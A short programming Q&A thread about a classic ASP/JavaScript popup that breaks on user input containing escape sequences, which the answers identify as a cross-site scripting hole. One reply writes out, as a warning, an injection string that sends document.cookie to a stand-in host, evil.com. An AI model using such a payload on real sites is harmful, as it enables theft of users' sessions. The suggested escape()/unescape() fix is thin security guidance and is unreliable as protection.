Escape Sequence problem-can not open a page

I have the following problem. I have a form where the user can enter some data. There are all kinds of users, so it happened the user enters the escape sequence (eg, text \ n text). This entry is inserting into the database. However, the user can click a button to open a pop up window in which it is displayed submit a comment. All windows operate smoothly, except those that contain escape sequences, they can not to be opened. This is a classic asp with java script. Has anyone had a similar problem? Maybe charset is problem开发者_运维百科?

You've discovered the more benign problems of XSS holes.

You need to Javascript-escape the strings.

You need to do this now, before someone enters ");document.location = "http://evil.com/?cookie=" + document.cookie;//

To go along with SLaks:

At the very least, use escape(stringVariable) and unescape(stringVariable) to encode (and later decode) most special characters to help prevent XSS (stands for Cross Site Scripting). SLaks's example shows someone injecting malicious code to redirect a user to another site while copying any existing cookie information.